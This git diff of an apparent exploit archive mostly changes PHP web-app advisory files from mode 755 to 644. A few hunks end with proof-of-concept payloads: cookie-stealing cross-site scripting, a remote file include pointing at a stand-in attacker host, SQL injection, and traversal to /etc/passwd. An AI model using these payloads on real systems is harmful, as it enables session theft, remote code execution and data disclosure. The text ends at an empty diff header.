b/platforms/php/webapps/2431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24311.txt b/platforms/php/webapps/24311.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2432.txt b/platforms/php/webapps/2432.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24324.txt b/platforms/php/webapps/24324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24329.txt b/platforms/php/webapps/24329.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2433.txt b/platforms/php/webapps/2433.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24330.txt b/platforms/php/webapps/24330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24331.txt b/platforms/php/webapps/24331.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24332.txt b/platforms/php/webapps/24332.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24333.txt b/platforms/php/webapps/24333.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24334.txt b/platforms/php/webapps/24334.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2434.txt b/platforms/php/webapps/2434.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24340.txt b/platforms/php/webapps/24340.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24341.txt b/platforms/php/webapps/24341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24348.txt b/platforms/php/webapps/24348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24349.txt b/platforms/php/webapps/24349.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2435.txt b/platforms/php/webapps/2435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24356.txt b/platforms/php/webapps/24356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24357.txt b/platforms/php/webapps/24357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24359.php b/platforms/php/webapps/24359.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2436.txt b/platforms/php/webapps/2436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24364.txt b/platforms/php/webapps/24364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24365.txt b/platforms/php/webapps/24365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24367.txt b/platforms/php/webapps/24367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2437.php b/platforms/php/webapps/2437.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24372.txt b/platforms/php/webapps/24372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24373.txt b/platforms/php/webapps/24373.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24375.txt b/platforms/php/webapps/24375.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24377.txt b/platforms/php/webapps/24377.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24378.txt b/platforms/php/webapps/24378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24379.txt b/platforms/php/webapps/24379.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2438.txt b/platforms/php/webapps/2438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24380.txt b/platforms/php/webapps/24380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24381.txt b/platforms/php/webapps/24381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24382.txt b/platforms/php/webapps/24382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24383.php b/platforms/php/webapps/24383.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24384.txt b/platforms/php/webapps/24384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24389.txt b/platforms/php/webapps/24389.txt old mode 100755 new mode 100644 index 1f89a4444..1ee530783 --- a/platforms/php/webapps/24389.txt +++ b/platforms/php/webapps/24389.txt @@ -8,4 +8,4 @@ Attackers may potentially exploit this issue to manipulate web content or to ste Versions 4.1, and all 4.1.x releases are reported vulnerable to this issue. -Whatever_you_want<script>alert("Your cookie is " + document.cookie)</script> \ No newline at end of file +Whatever_you_want<script>alert("Your cookie is " + document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2439.txt b/platforms/php/webapps/2439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24390.txt b/platforms/php/webapps/24390.txt old mode 100755 new mode 100644 index d74d47606..beb0bf30b --- a/platforms/php/webapps/24390.txt +++ b/platforms/php/webapps/24390.txt @@ -8,4 +8,4 @@ This vulnerability could be exploited by a remote attacker to execute arbitrary Version 0.19.0a is reported vulnerable to this issue. Other versions are also likely affected. -http://www.example.com/mantis/core/bug_api.php?t_core_dir=http://attackers.example.com/ \ No newline at end of file +http://www.example.com/mantis/core/bug_api.php?t_core_dir=http://attackers.example.com/ \ No newline at end of file diff --git a/platforms/php/webapps/24391.txt b/platforms/php/webapps/24391.txt old mode 100755 new mode 100644 index 1dc99c2c9..c8653ac5e --- a/platforms/php/webapps/24391.txt +++ b/platforms/php/webapps/24391.txt @@ -12,4 +12,4 @@ http://www.example.com/login_page.php?return=[XSS] http://www.example.com/signup.php?username=user&email=[XSS] http://www.example.com/login_select_proj_page.php?ref=[XSS] http://www.example.com/login_select_proj_page.php?ref=%22%3E[XSS] -http://www.example.com/view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script> \ No newline at end of file +http://www.example.com/view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script> \ No newline at end of file diff --git a/platforms/php/webapps/24392.php b/platforms/php/webapps/24392.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24393.txt b/platforms/php/webapps/24393.txt old mode 100755 new mode 100644 index 9a42b7fb7..d09fe5177 --- a/platforms/php/webapps/24393.txt +++ b/platforms/php/webapps/24393.txt @@ -15,4 +15,4 @@ The SQL injection is reportedly fixed in version 1.4.2. Versions prior to this a http://www.example.com/demo/out/out.ViewFolder.php?folderid=3 or 1=1 An example for the directory traversal vulnerability: -http://www.example.com/mydms/op/op.ViewOnline.php?request=4:6:/../../../../../etc/passwd \ No newline at end of file +http://www.example.com/mydms/op/op.ViewOnline.php?request=4:6:/../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/24399.txt b/platforms/php/webapps/24399.txt old mode 100755 new mode 100644 index c82b722c3..9caf10b1e --- a/platforms/php/webapps/24399.txt +++ b/platforms/php/webapps/24399.txt @@ -6,4 +6,4 @@ This issue could permit a remote attacker to create a malicious URI link that in All versions of PhotoADay are considered vulnerable at the moment. -http://www.example.com/modules.php?name=Photo_A_Day&action=single&pad_selected=44%20UNION%20SELECT%20< script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/modules.php?name=Photo_A_Day&action=single&pad_selected=44%20UNION%20SELECT%20< script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/24403.txt b/platforms/php/webapps/24403.txt old mode 100755 new mode 100644 index 26c67a517..dbff7754f --- a/platforms/php/webapps/24403.txt +++ b/platforms/php/webapps/24403.txt @@ -10,4 +10,4 @@ Additionally HTML injection vulnerabilities are reported for the eGroupWare 'Mes Attackers may potentially exploit these issues to manipulate web content or to steal cookie-based authentication credentials. It may be possible to take arbitrary actions as the victim user. -http://www.example.com/egroupware/index.php?menuaction=calendar.uicalendar.day&date=20040701"><script>alert(document.cookie)</script \ No newline at end of file +http://www.example.com/egroupware/index.php?menuaction=calendar.uicalendar.day&date=20040701"><script>alert(document.cookie)</script \ No newline at end of file diff --git a/platforms/php/webapps/24405.txt b/platforms/php/webapps/24405.txt old mode 100755 new mode 100644 index 12c31e5c0..d316df04e --- a/platforms/php/webapps/24405.txt +++ b/platforms/php/webapps/24405.txt @@ -6,4 +6,4 @@ This issue could permit a remote attacker to create a malicious URI link that in This issue was identified in the demo version of Plesk Reloaded 7.1. It is likely that other versions are affected as well. -http://www.example.com:8443/login_up.php3?login_name="><script>alert(document.cookie)</script><"&passwd=TheSur \ No newline at end of file +http://www.example.com:8443/login_up.php3?login_name="><script>alert(document.cookie)</script><"&passwd=TheSur \ No newline at end of file diff --git a/platforms/php/webapps/24410.txt b/platforms/php/webapps/24410.txt old mode 100755 new mode 100644 index 1dc471977..d55511497 --- a/platforms/php/webapps/24410.txt +++ b/platforms/php/webapps/24410.txt @@ -5,4 +5,4 @@ PHP Code Snippet Library is reported prone to multiple cross-site scripting vuln These issues could permit a remote attacker to create a malicious URI link to the PHP Code Snippet Library site that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks. http://www.example.com/[path]/index.php?cat_select=[XSS] -http://www.example.com/[path]/index.php?cat_select=[XSS]&show=[XSS] \ No newline at end of file +http://www.example.com/[path]/index.php?cat_select=[XSS]&show=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/24415.txt b/platforms/php/webapps/24415.txt old mode 100755 new mode 100644 index ad26a9e32..088fababf --- a/platforms/php/webapps/24415.txt +++ b/platforms/php/webapps/24415.txt @@ -35,4 +35,4 @@ document.write(tag+web+path); The following proof of concept has been provided for the 'letter.php' script issue: -ttp://attaker/modules/dictionary/letter.php?letter="><script>document.write(document.cookie)<script>( \ No newline at end of file +ttp://attaker/modules/dictionary/letter.php?letter="><script>document.write(document.cookie)<script>( \ No newline at end of file diff --git a/platforms/php/webapps/2442.txt b/platforms/php/webapps/2442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24424.txt b/platforms/php/webapps/24424.txt old mode 100755 new mode 100644 index 4061cfbff..6227ac124 --- a/platforms/php/webapps/24424.txt +++ b/platforms/php/webapps/24424.txt @@ -9,4 +9,4 @@ Although this issue reportedly affects versions 1.3 through 1.6 of the affected GET / HTTP/1.1 User-Agent: <script>alert('xss')</script> Host: www.example.com -Accept: */* \ No newline at end of file +Accept: */* \ No newline at end of file diff --git a/platforms/php/webapps/24425.txt b/platforms/php/webapps/24425.txt old mode 100755 new mode 100644 index 2d31acbba..6d5c27f48 --- a/platforms/php/webapps/24425.txt +++ b/platforms/php/webapps/24425.txt @@ -12,4 +12,4 @@ Attackers may potentially exploit this issue to manipulate web content, take una These vulnerabilities were reported in phpWebsite 0.9.3-4, previous versions are also reported to be vulnerable. -/index.php?module=comments&CM_op=replyToComment&CM_pid=1[XSS] \ No newline at end of file +/index.php?module=comments&CM_op=replyToComment&CM_pid=1[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/2443.txt b/platforms/php/webapps/2443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24433.txt b/platforms/php/webapps/24433.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24436.txt b/platforms/php/webapps/24436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24438.txt b/platforms/php/webapps/24438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24445.txt b/platforms/php/webapps/24445.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24451.txt b/platforms/php/webapps/24451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24452.txt b/platforms/php/webapps/24452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24454.txt b/platforms/php/webapps/24454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24456.txt b/platforms/php/webapps/24456.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24457.txt b/platforms/php/webapps/24457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2446.php b/platforms/php/webapps/2446.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24462.txt b/platforms/php/webapps/24462.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24465.txt b/platforms/php/webapps/24465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2447.php b/platforms/php/webapps/2447.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24472.txt b/platforms/php/webapps/24472.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24480.txt b/platforms/php/webapps/24480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24481.txt b/platforms/php/webapps/24481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2449.txt b/platforms/php/webapps/2449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24492.php b/platforms/php/webapps/24492.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2450.txt b/platforms/php/webapps/2450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24501.txt b/platforms/php/webapps/24501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24506.txt b/platforms/php/webapps/24506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24507.txt b/platforms/php/webapps/24507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24508.txt b/platforms/php/webapps/24508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24509.txt b/platforms/php/webapps/24509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2451.txt b/platforms/php/webapps/2451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24510.txt b/platforms/php/webapps/24510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24512.txt b/platforms/php/webapps/24512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24514.txt b/platforms/php/webapps/24514.txt old mode 100755 new mode 100644 index 3fe3a0408..6f2f5d99f --- a/platforms/php/webapps/24514.txt +++ b/platforms/php/webapps/24514.txt @@ -36,5 +36,4 @@ # # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx # # Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy) - ################################################################################# - \ No newline at end of file + ################################################################################# \ No newline at end of file diff --git a/platforms/php/webapps/24515.txt b/platforms/php/webapps/24515.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24516.txt b/platforms/php/webapps/24516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2452.txt b/platforms/php/webapps/2452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24520.txt b/platforms/php/webapps/24520.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24522.txt b/platforms/php/webapps/24522.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2453.txt b/platforms/php/webapps/2453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24530.txt b/platforms/php/webapps/24530.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24531.txt b/platforms/php/webapps/24531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24533.txt b/platforms/php/webapps/24533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24536.txt b/platforms/php/webapps/24536.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24537.txt b/platforms/php/webapps/24537.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2454.txt b/platforms/php/webapps/2454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24542.txt b/platforms/php/webapps/24542.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24544.txt b/platforms/php/webapps/24544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24545.txt b/platforms/php/webapps/24545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24546.txt b/platforms/php/webapps/24546.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2455.php b/platforms/php/webapps/2455.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24551.txt b/platforms/php/webapps/24551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24552.txt b/platforms/php/webapps/24552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2456.php b/platforms/php/webapps/2456.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24560.txt b/platforms/php/webapps/24560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24561.txt b/platforms/php/webapps/24561.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24562.txt b/platforms/php/webapps/24562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24564.txt b/platforms/php/webapps/24564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24565.txt b/platforms/php/webapps/24565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24566.txt b/platforms/php/webapps/24566.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2457.php b/platforms/php/webapps/2457.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24575.txt b/platforms/php/webapps/24575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24582.txt b/platforms/php/webapps/24582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24583.txt b/platforms/php/webapps/24583.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24585.txt b/platforms/php/webapps/24585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24587.txt b/platforms/php/webapps/24587.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2459.txt b/platforms/php/webapps/2459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24601.txt b/platforms/php/webapps/24601.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2461.txt b/platforms/php/webapps/2461.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24613.txt b/platforms/php/webapps/24613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24614.txt b/platforms/php/webapps/24614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24615.txt b/platforms/php/webapps/24615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24616.txt b/platforms/php/webapps/24616.txt old mode 100755 new mode 100644 index 23878160f..373b1bcca --- a/platforms/php/webapps/24616.txt +++ b/platforms/php/webapps/24616.txt @@ -4,4 +4,4 @@ Tutos is reported prone to multiple remote input-validation vulnerabilities. The These issue reportedly affect Tutos 1.1.2004-04-14. -http://www.example.com/file/file_overview.php?link_id=1005'asdf \ No newline at end of file +http://www.example.com/file/file_overview.php?link_id=1005'asdf \ No newline at end of file diff --git a/platforms/php/webapps/24617.txt b/platforms/php/webapps/24617.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2462.txt b/platforms/php/webapps/2462.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24627.txt b/platforms/php/webapps/24627.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24629.txt b/platforms/php/webapps/24629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24638.txt b/platforms/php/webapps/24638.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24641.txt b/platforms/php/webapps/24641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24642.txt b/platforms/php/webapps/24642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24643.txt b/platforms/php/webapps/24643.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24644.txt b/platforms/php/webapps/24644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24645.txt b/platforms/php/webapps/24645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24646.txt b/platforms/php/webapps/24646.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24647.txt b/platforms/php/webapps/24647.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24648.txt b/platforms/php/webapps/24648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24649.txt b/platforms/php/webapps/24649.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2465.php b/platforms/php/webapps/2465.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24650.txt b/platforms/php/webapps/24650.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24651.txt b/platforms/php/webapps/24651.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24652.txt b/platforms/php/webapps/24652.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24655.txt b/platforms/php/webapps/24655.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24657.txt b/platforms/php/webapps/24657.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24659.txt b/platforms/php/webapps/24659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24660.txt b/platforms/php/webapps/24660.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24661.txt b/platforms/php/webapps/24661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24662.txt b/platforms/php/webapps/24662.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24663.txt b/platforms/php/webapps/24663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24664.txt b/platforms/php/webapps/24664.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24665.txt b/platforms/php/webapps/24665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24667.txt b/platforms/php/webapps/24667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24676.txt b/platforms/php/webapps/24676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2468.txt b/platforms/php/webapps/2468.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24683.txt b/platforms/php/webapps/24683.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24685.txt b/platforms/php/webapps/24685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24692.txt b/platforms/php/webapps/24692.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24697.txt b/platforms/php/webapps/24697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24698.txt b/platforms/php/webapps/24698.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2470.txt b/platforms/php/webapps/2470.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24702.txt b/platforms/php/webapps/24702.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24718.txt b/platforms/php/webapps/24718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24719.txt b/platforms/php/webapps/24719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24729.txt b/platforms/php/webapps/24729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2473.c b/platforms/php/webapps/2473.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24731.txt b/platforms/php/webapps/24731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24732.txt b/platforms/php/webapps/24732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24734.txt b/platforms/php/webapps/24734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24735.txt b/platforms/php/webapps/24735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24736.txt b/platforms/php/webapps/24736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24737.txt b/platforms/php/webapps/24737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24739.txt b/platforms/php/webapps/24739.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2474.txt b/platforms/php/webapps/2474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24742.txt b/platforms/php/webapps/24742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24748.txt b/platforms/php/webapps/24748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2475.txt b/platforms/php/webapps/2475.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24752.txt b/platforms/php/webapps/24752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24759.txt b/platforms/php/webapps/24759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2476.txt b/platforms/php/webapps/2476.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24762.txt b/platforms/php/webapps/24762.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24766.txt b/platforms/php/webapps/24766.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24768.txt b/platforms/php/webapps/24768.txt old mode 100755 new mode 100644 index 912c3f0a9..025a3e001 --- a/platforms/php/webapps/24768.txt +++ b/platforms/php/webapps/24768.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/11740/info SugarCRM is reported prone to multiple vulnerabilites arising from insufficient sanitization of user-supplied input. These issues can a remote attacker to carry out cross-site scripting, HTML injection, SQL injection and directory traversal attacks. -index.php?action=DetailView&module=Accounts&record=[SQL] \ No newline at end of file +index.php?action=DetailView&module=Accounts&record=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/24769.txt b/platforms/php/webapps/24769.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2477.txt b/platforms/php/webapps/2477.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24771.txt b/platforms/php/webapps/24771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24772.txt b/platforms/php/webapps/24772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2478.txt b/platforms/php/webapps/2478.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24782.txt b/platforms/php/webapps/24782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24783.txt b/platforms/php/webapps/24783.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2479.txt b/platforms/php/webapps/2479.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24790.txt b/platforms/php/webapps/24790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24796.txt b/platforms/php/webapps/24796.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24797.txt b/platforms/php/webapps/24797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24798.txt b/platforms/php/webapps/24798.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2480.txt b/platforms/php/webapps/2480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24803.txt b/platforms/php/webapps/24803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24806.txt b/platforms/php/webapps/24806.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2481.txt b/platforms/php/webapps/2481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24810.txt b/platforms/php/webapps/24810.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24814.txt b/platforms/php/webapps/24814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24816.txt b/platforms/php/webapps/24816.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24817.txt b/platforms/php/webapps/24817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24819.txt b/platforms/php/webapps/24819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24820.txt b/platforms/php/webapps/24820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24821.txt b/platforms/php/webapps/24821.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24822.txt b/platforms/php/webapps/24822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24823.txt b/platforms/php/webapps/24823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24824.txt b/platforms/php/webapps/24824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24825.txt b/platforms/php/webapps/24825.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24826.txt b/platforms/php/webapps/24826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24827.txt b/platforms/php/webapps/24827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24829.txt b/platforms/php/webapps/24829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2483.txt b/platforms/php/webapps/2483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24830.txt b/platforms/php/webapps/24830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24831.txt b/platforms/php/webapps/24831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24832.txt b/platforms/php/webapps/24832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24834.txt b/platforms/php/webapps/24834.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24835.txt b/platforms/php/webapps/24835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24837.txt b/platforms/php/webapps/24837.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2484.txt b/platforms/php/webapps/2484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24842.txt b/platforms/php/webapps/24842.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24844.txt b/platforms/php/webapps/24844.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24845.txt b/platforms/php/webapps/24845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24846.txt b/platforms/php/webapps/24846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24847.txt b/platforms/php/webapps/24847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24849.txt b/platforms/php/webapps/24849.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24850.txt b/platforms/php/webapps/24850.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24851.txt b/platforms/php/webapps/24851.txt old mode 100755 new mode 100644 index 5f5a13e8d..fb2feb5de --- a/platforms/php/webapps/24851.txt +++ b/platforms/php/webapps/24851.txt 